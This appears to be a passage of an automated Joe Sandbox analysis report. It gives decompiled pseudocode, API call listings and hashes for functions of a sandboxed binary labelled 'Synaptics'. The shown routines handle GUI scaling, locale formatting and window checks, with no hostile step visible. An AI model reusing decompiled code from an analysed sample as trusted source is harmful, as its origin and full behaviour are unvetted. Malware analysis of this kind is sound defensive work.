                                                                                                                                                                                                                            						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
                                                                                                                                                                                                                            						_t121[2] = _t64;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
                                                                                                                                                                                                                            				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
                                                                                                                                                                                                                            					_t121[3] =  *(_t118 + 0x4c);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(_t65 == 0) {
                                                                                                                                                                                                                            						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
                                                                                                                                                                                                                            				_t113 =  *0x43ad44; // 0x0
                                                                                                                                                                                                                            				if(_t113 != (_t107 &  *0x43ad40)) {
                                                                                                                                                                                                                            					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t114 =  *0x43ad44; // 0x0
                                                                                                                                                                                                                            				if(_t114 != (_t107 &  *0x43ad48)) {
                                                                                                                                                                                                                            					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
                                                                                                                                                                                                                            					E004250B0( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E00425094( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				goto L29;
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043ABD1
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043ABEB
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043AC19
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043AC2F
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043AC67
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,?), ref: 0043AC7F
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACC9
                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,?,0000001F), ref: 0043ACF2
                                                                                                                                                                                                                            • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0043AD18
                                                                                                                                                                                                                              • Part of subcall function 004250B0: MulDiv.KERNEL32(00000000,?,00000048), ref: 004250BD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                                                                                                                                                                                            • Instruction ID: d10f16ddfd9cc23340e03066ebc6cedff9c8bd4490aae9a17c26e6f9981b1e60
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 74bc730eb7918a069ca069f08e5092c7babda7016c5e1a77fecd0a99066e1a0c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6518E70648744AFC320DB29C841B6BB7E9AF59304F04A81EB9D5C7792C63DEC508B1A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E0040E2E8(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                            				char _v24;
                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                            				char _v56;
                                                                                                                                                                                                                            				char _v60;
                                                                                                                                                                                                                            				char _v64;
                                                                                                                                                                                                                            				char _v68;
                                                                                                                                                                                                                            				void* _t104;
                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                            				void* _t133;
                                                                                                                                                                                                                            				intOrPtr _t183;
                                                                                                                                                                                                                            				intOrPtr _t193;
                                                                                                                                                                                                                            				intOrPtr _t194;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t191 = __esi;
                                                                                                                                                                                                                            				_t190 = __edi;
                                                                                                                                                                                                                            				_t193 = _t194;
                                                                                                                                                                                                                            				_t133 = 8;
                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_push(0);
                                                                                                                                                                                                                            					_t133 = _t133 - 1;
                                                                                                                                                                                                                            				} while (_t133 != 0);
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_push(_t193);
                                                                                                                                                                                                                            				_push(0x40e5b3);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t194;
                                                                                                                                                                                                                            				E0040E174();
                                                                                                                                                                                                                            				E0040CA14(__ebx, __edi, __esi);
                                                                                                                                                                                                                            				_t196 =  *0x49e750;
                                                                                                                                                                                                                            				if( *0x49e750 != 0) {
                                                                                                                                                                                                                            					E0040CBEC(__esi, _t196);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t132 = GetThreadLocale();
                                                                                                                                                                                                                            				E0040C964(_t43, 0, 0x14,  &_v20);
                                                                                                                                                                                                                            				E00404A14(0x49e684, _v20);
                                                                                                                                                                                                                            				E0040C964(_t43, 0x40e5c8, 0x1b,  &_v24);
                                                                                                                                                                                                                            				 *0x49e688 = E00409664(0x40e5c8, 0, _t196);
                                                                                                                                                                                                                            				E0040C964(_t132, 0x40e5c8, 0x1c,  &_v28);
                                                                                                                                                                                                                            				 *0x49e689 = E00409664(0x40e5c8, 0, _t196);
                                                                                                                                                                                                                            				 *0x49e68a = E0040C9B0(_t132, 0x2c, 0xf);
                                                                                                                                                                                                                            				 *0x49e68b = E0040C9B0(_t132, 0x2e, 0xe);
                                                                                                                                                                                                                            				E0040C964(_t132, 0x40e5c8, 0x19,  &_v32);
                                                                                                                                                                                                                            				 *0x49e68c = E00409664(0x40e5c8, 0, _t196);
                                                                                                                                                                                                                            				 *0x49e68d = E0040C9B0(_t132, 0x2f, 0x1d);
                                                                                                                                                                                                                            				E0040C964(_t132, "m/d/yy", 0x1f,  &_v40);
                                                                                                                                                                                                                            				E0040CC9C(_v40, _t132,  &_v36, _t190, _t191, _t196);
                                                                                                                                                                                                                            				E00404A14(0x49e690, _v36);
                                                                                                                                                                                                                            				E0040C964(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                                                                                                                                                                                                                            				E0040CC9C(_v48, _t132,  &_v44, _t190, _t191, _t196);
                                                                                                                                                                                                                            				E00404A14(0x49e694, _v44);
                                                                                                                                                                                                                            				 *0x49e698 = E0040C9B0(_t132, 0x3a, 0x1e);
                                                                                                                                                                                                                            				E0040C964(_t132, 0x40e5fc, 0x28,  &_v52);
                                                                                                                                                                                                                            				E00404A14(0x49e69c, _v52);
                                                                                                                                                                                                                            				E0040C964(_t132, 0x40e608, 0x29,  &_v56);
                                                                                                                                                                                                                            				E00404A14(0x49e6a0, _v56);
                                                                                                                                                                                                                            				E004049C0( &_v12);
                                                                                                                                                                                                                            				E004049C0( &_v16);
                                                                                                                                                                                                                            				E0040C964(_t132, 0x40e5c8, 0x25,  &_v60);
                                                                                                                                                                                                                            				_t104 = E00409664(0x40e5c8, 0, _t196);
                                                                                                                                                                                                                            				_t197 = _t104;
                                                                                                                                                                                                                            				if(_t104 != 0) {
                                                                                                                                                                                                                            					E00404A58( &_v8, 0x40e620);
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					E00404A58( &_v8, 0x40e614);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				E0040C964(_t132, 0x40e5c8, 0x23,  &_v64);
                                                                                                                                                                                                                            				_t111 = E00409664(0x40e5c8, 0, _t197);
                                                                                                                                                                                                                            				_t198 = _t111;
                                                                                                                                                                                                                            				if(_t111 == 0) {
                                                                                                                                                                                                                            					E0040C964(_t132, 0x40e5c8, 0x1005,  &_v68);
                                                                                                                                                                                                                            					if(E00409664(0x40e5c8, 0, _t198) != 0) {
                                                                                                                                                                                                                            						E00404A58( &_v12, 0x40e63c);
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E00404A58( &_v16, 0x40e62c);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_push(_v12);
                                                                                                                                                                                                                            				_push(_v8);
                                                                                                                                                                                                                            				_push(":mm");
                                                                                                                                                                                                                            				_push(_v16);
                                                                                                                                                                                                                            				E00404D40();
                                                                                                                                                                                                                            				_push(_v12);
                                                                                                                                                                                                                            				_push(_v8);
                                                                                                                                                                                                                            				_push(":mm:ss");
                                                                                                                                                                                                                            				_push(_v16);
                                                                                                                                                                                                                            				E00404D40();
                                                                                                                                                                                                                            				 *0x49e752 = E0040C9B0(_t132, 0x2c, 0xc);
                                                                                                                                                                                                                            				_pop(_t183);
                                                                                                                                                                                                                            				 *[fs:eax] = _t183;
                                                                                                                                                                                                                            				_push(E0040E5BA);
                                                                                                                                                                                                                            				return E004049E4( &_v68, 0x10);
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetThreadLocale.KERNEL32(00000000,0040E5B3,?,?,00000000,00000000), ref: 0040E31E
                                                                                                                                                                                                                              • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                                                                                                            • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                                                            • API String ID: 4232894706-2493093252
                                                                                                                                                                                                                            • Opcode ID: 7a4ec08d60e7301cad96d7fb6775c5cef7f2f9e679167df0a97288120caaca56
                                                                                                                                                                                                                            • Instruction ID: 2ac3dc33e66767ce4b71c968eb597fff0a4fdc25e0501dc74ddfc3eea00af484
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a4ec08d60e7301cad96d7fb6775c5cef7f2f9e679167df0a97288120caaca56
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 47612FB07002489BDB00EBF6D881A9E76A59B98704F50993BB100BB3C6DA3DDD15971D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                            			E004388F0(intOrPtr __eax, void* __ecx, intOrPtr _a4) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				char _v12;
                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                            				struct HWND__* _v24;
                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                            				struct tagRECT _v48;
                                                                                                                                                                                                                            				struct tagRECT _v64;
                                                                                                                                                                                                                            				struct HWND__* _t53;
                                                                                                                                                                                                                            				intOrPtr _t55;
                                                                                                                                                                                                                            				intOrPtr _t60;
                                                                                                                                                                                                                            				intOrPtr _t65;
                                                                                                                                                                                                                            				intOrPtr _t78;
                                                                                                                                                                                                                            				intOrPtr _t84;
                                                                                                                                                                                                                            				intOrPtr _t86;
                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                            				intOrPtr _t98;
                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                            				void* _t102;
                                                                                                                                                                                                                            				intOrPtr* _t104;
                                                                                                                                                                                                                            				intOrPtr _t106;
                                                                                                                                                                                                                            				intOrPtr _t110;
                                                                                                                                                                                                                            				intOrPtr _t112;
                                                                                                                                                                                                                            				struct HWND__* _t113;
                                                                                                                                                                                                                            				intOrPtr _t114;
                                                                                                                                                                                                                            				intOrPtr _t116;
                                                                                                                                                                                                                            				intOrPtr _t117;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t102 = __ecx;
                                                                                                                                                                                                                            				_t101 = __eax;
                                                                                                                                                                                                                            				_v5 = 1;
                                                                                                                                                                                                                            				_t113 = E00438D40(_a4 + 0xfffffff7);
                                                                                                                                                                                                                            				_v24 = _t113;
                                                                                                                                                                                                                            				_t53 = GetWindow(_t113, "true");
                                                                                                                                                                                                                            				_t104 =  *0x49dbcc; // 0x49ebb8
                                                                                                                                                                                                                            				_t4 =  *_t104 + 0x30; // 0x70374
                                                                                                                                                                                                                            				if(_t53 ==  *_t4) {
                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                            					if(_v24 == 0) {
                                                                                                                                                                                                                            						L25:
                                                                                                                                                                                                                            						return _v5;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t114 = _t101;
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						_t55 =  *((intOrPtr*)(_t114 + 0x30));
                                                                                                                                                                                                                            						if(_t55 == 0) {
                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t114 = _t55;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t112 = E00441704(_t114);
                                                                                                                                                                                                                            					_v28 = _t112;
                                                                                                                                                                                                                            					if(_t112 == _v24) {
                                                                                                                                                                                                                            						goto L25;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t13 = _a4 - 0x10; // 0xe87d83e8
                                                                                                                                                                                                                            					_t60 =  *((intOrPtr*)( *_t13 + 0x30));
                                                                                                                                                                                                                            					if(_t60 == 0) {
                                                                                                                                                                                                                            						_t19 = _a4 - 0x10; // 0xe87d83e8
                                                                                                                                                                                                                            						_t106 =  *0x437498; // 0x4374e4
                                                                                                                                                                                                                            						__eflags = E00403D78( *_t19, _t106);
                                                                                                                                                                                                                            						if(__eflags == 0) {
                                                                                                                                                                                                                            							__eflags = 0;
                                                                                                                                                                                                                            							_v32 = 0;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							_t21 = _a4 - 0x10; // 0xe87d83e8
                                                                                                                                                                                                                            							_v32 = E00441704( *_t21);
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						L19:
                                                                                                                                                                                                                            						_v12 = 0;
                                                                                                                                                                                                                            						_t65 = _a4;
                                                                                                                                                                                                                            						_v20 =  *((intOrPtr*)(_t65 - 9));
                                                                                                                                                                                                                            						_v16 =  *((intOrPtr*)(_t65 - 5));
                                                                                                                                                                                                                            						_push( &_v32);
                                                                                                                                                                                                                            						_push(E00438884);
                                                                                                                                                                                                                            						_push(GetCurrentThreadId());
                                                                                                                                                                                                                            						L004075C8();
                                                                                                                                                                                                                            						_t126 = _v12;
                                                                                                                                                                                                                            						if(_v12 == 0) {
                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						GetWindowRect(_v24,  &_v48);
                                                                                                                                                                                                                            						_push(_a4 + 0xfffffff7);
                                                                                                                                                                                                                            						_push(_a4 - 1);
                                                                                                                                                                                                                            						E00403DE8(_t101, _t126);
                                                                                                                                                                                                                            						_t78 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            						_t110 =  *0x4360a0; // 0x4360ec
                                                                                                                                                                                                                            						if(E00403D78(_t78, _t110) == 0) {
                                                                                                                                                                                                                            							L23:
                                                                                                                                                                                                                            							if(IntersectRect( &_v48,  &_v48,  &_v64) != 0) {
                                                                                                                                                                                                                            								_v5 = 0;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t84 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            						if( *((intOrPtr*)( *((intOrPtr*)(_t84 + 0x38)) + 0xa0)) == 0) {
                                                                                                                                                                                                                            							goto L23;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t86 =  *0x49eb38; // 0x0
                                                                                                                                                                                                                            						if(E00441704( *((intOrPtr*)( *((intOrPtr*)(_t86 + 0x38)) + 0xa0))) == _v24) {
                                                                                                                                                                                                                            							goto L25;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						goto L23;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t116 = _t60;
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						_t93 =  *((intOrPtr*)(_t116 + 0x30));
                                                                                                                                                                                                                            						if(_t93 == 0) {
                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t116 = _t93;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v32 = E00441704(_t116);
                                                                                                                                                                                                                            					goto L19;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t117 = E00437E5C(_v24, _t102);
                                                                                                                                                                                                                            				if(_t117 == 0) {
                                                                                                                                                                                                                            					goto L25;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                            						_t98 =  *((intOrPtr*)(_t117 + 0x30));
                                                                                                                                                                                                                            						if(_t98 == 0) {
                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						_t117 = _t98;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_v24 = E00441704(_t117);
                                                                                                                                                                                                                            					goto L6;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                            0x004389c7
                                                                                                                                                                                                                            0x004389b5
                                                                                                                                                                                                                            0x004389b8
                                                                                                                                                                                                                            0x004389c0
                                                                                                                                                                                                                            0x004389c0
                                                                                                                                                                                                                            0x004389ca
                                                                                                                                                                                                                            0x004389ca
                                                                                                                                                                                                                            0x004389ce
                                                                                                                                                                                                                            0x004389d4
                                                                                                                                                                                                                            0x004389da
                                                                                                                                                                                                                            0x004389e0
                                                                                                                                                                                                                            0x004389e1
                                                                                                                                                                                                                            0x004389eb
                                                                                                                                                                                                                            0x004389ec
                                                                                                                                                                                                                            0x004389f1
                                                                                                                                                                                                                            0x004389f5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438a03
                                                                                                                                                                                                                            0x00438a0e
                                                                                                                                                                                                                            0x00438a13
                                                                                                                                                                                                                            0x00438a23
                                                                                                                                                                                                                            0x00438a28
                                                                                                                                                                                                                            0x00438a2d
                                                                                                                                                                                                                            0x00438a3a
                                                                                                                                                                                                                            0x00438a65
                                                                                                                                                                                                                            0x00438a78
                                                                                                                                                                                                                            0x00438a7a
                                                                                                                                                                                                                            0x00438a7a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438a78
                                                                                                                                                                                                                            0x00438a3c
                                                                                                                                                                                                                            0x00438a4b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438a4d
                                                                                                                                                                                                                            0x00438a63
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438a63
                                                                                                                                                                                                                            0x00438987
                                                                                                                                                                                                                            0x0043898d
                                                                                                                                                                                                                            0x0043898d
                                                                                                                                                                                                                            0x00438992
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043898b
                                                                                                                                                                                                                            0x0043898b
                                                                                                                                                                                                                            0x0043899b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0043899b
                                                                                                                                                                                                                            0x0043892c
                                                                                                                                                                                                                            0x00438930
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438936
                                                                                                                                                                                                                            0x0043893a
                                                                                                                                                                                                                            0x0043893a
                                                                                                                                                                                                                            0x0043893f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438938
                                                                                                                                                                                                                            0x00438938
                                                                                                                                                                                                                            0x00438948
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00438948

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 00438D40: WindowFromPoint.USER32(00438B1A,0049EB5C,00000000,0043890A,?,-0000000C,?), ref: 00438D46
                                                                                                                                                                                                                              • Part of subcall function 00438D40: GetParent.USER32(00000000), ref: 00438D5D
                                                                                                                                                                                                                            • GetWindow.USER32(00000000,?), ref: 00438912
                                                                                                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 004389E6
                                                                                                                                                                                                                            • 73C9AC10.USER32(00000000,00438884,?,00000000,?,?,-0000000C,?), ref: 004389EC
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 00438A03
                                                                                                                                                                                                                            • IntersectRect.USER32 ref: 00438A71
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GetWindowThreadProcessId.USER32(00000000), ref: 00437E69
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GetCurrentProcessId.KERNEL32(?,?,00000000,0045A3E7,?,?,0049ABD1,00000001,0045A553,?,?,?,0049ABD1), ref: 00437E72
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GlobalFindAtomA.KERNEL32(00000000), ref: 00437E87
                                                                                                                                                                                                                              • Part of subcall function 00437E5C: GetPropA.USER32 ref: 00437E9E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$CurrentProcessRectThread$AtomFindFromGlobalIntersectParentPointProp
                                                                                                                                                                                                                            • String ID: `C$tC
                                                                                                                                                                                                                            • API String ID: 2049660638-2788972245
                                                                                                                                                                                                                            • Opcode ID: dba84d86d5a6676c331673e93b0d571f08622f392858292f363986459535cfd1
                                                                                                                                                                                                                            • Instruction ID: 3581ce7dd3e3bfbf2e623d4eb096478338c089ca1b68be53d8a0d9a7386b4eb1
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dba84d86d5a6676c331673e93b0d571f08622f392858292f363986459535cfd1
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6515F75A002099FCB10DFA9C481BAEB7F4AF08354F14516AF855EB351DB38ED41CB9A
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetActiveWindow.USER32 ref: 0045A8B7
                                                                                                                                                                                                                            • GetWindowRect.USER32 ref: 0045A911
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,?), ref: 0045A949
                                                                                                                                                                                                                            • MessageBoxA.USER32 ref: 0045A98A
                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,0045AA00,?,00000000,0045A9F9), ref: 0045A9DA
                                                                                                                                                                                                                            • SetActiveWindow.USER32(?,0045AA00,?,00000000,0045A9F9), ref: 0045A9EB
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Window$Active$MessageRect
                                                                                                                                                                                                                            • String ID: (
                                                                                                                                                                                                                            • API String ID: 3147912190-3887548279
                                                                                                                                                                                                                            • Opcode ID: 0a2ee42d7a16d8424a56c7e2c40748980ad704c4b7b461ab7389184e891e9d68
                                                                                                                                                                                                                            • Instruction ID: aa5883e2080ee4b6071f7524ee1856c0ab285683fbf4ba5b2f0a51d728674732
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a2ee42d7a16d8424a56c7e2c40748980ad704c4b7b461ab7389184e891e9d68
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35414EB5E00108AFDB04DBA9CD85FAE77F9FB48305F14456AF900E7392D674AD048B55
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                            			E00428300(void* __eax, void* __ebx, int __ecx, intOrPtr* __edx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr* _v8;
                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                            				BYTE* _v16;
                                                                                                                                                                                                                            				intOrPtr _v18;
                                                                                                                                                                                                                            				signed int _v24;
                                                                                                                                                                                                                            				short _v26;
                                                                                                                                                                                                                            				short _v28;
                                                                                                                                                                                                                            				short _v30;
                                                                                                                                                                                                                            				short _v32;
                                                                                                                                                                                                                            				char _v38;
                                                                                                                                                                                                                            				struct tagMETAFILEPICT _v54;
                                                                                                                                                                                                                            				intOrPtr _v118;
                                                                                                                                                                                                                            				intOrPtr _v122;
                                                                                                                                                                                                                            				struct tagENHMETAHEADER _v154;
                                                                                                                                                                                                                            				intOrPtr _t103;
                                                                                                                                                                                                                            				intOrPtr _t115;
                                                                                                                                                                                                                            				struct HENHMETAFILE__* _t119;
                                                                                                                                                                                                                            				struct HENHMETAFILE__* _t120;
                                                                                                                                                                                                                            				void* _t122;
                                                                                                                                                                                                                            				void* _t123;
                                                                                                                                                                                                                            				void* _t124;
                                                                                                                                                                                                                            				void* _t125;
                                                                                                                                                                                                                            				intOrPtr _t126;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t124 = _t125;
                                                                                                                                                                                                                            				_t126 = _t125 + 0xffffff68;
                                                                                                                                                                                                                            				_v12 = __ecx;
                                                                                                                                                                                                                            				_v8 = __edx;
                                                                                                                                                                                                                            				_t122 = __eax;
                                                                                                                                                                                                                            				E0042819C(__eax);
                                                                                                                                                                                                                            				 *((intOrPtr*)( *_v8 + 0xc))(__edi, __esi, __ebx, _t123);
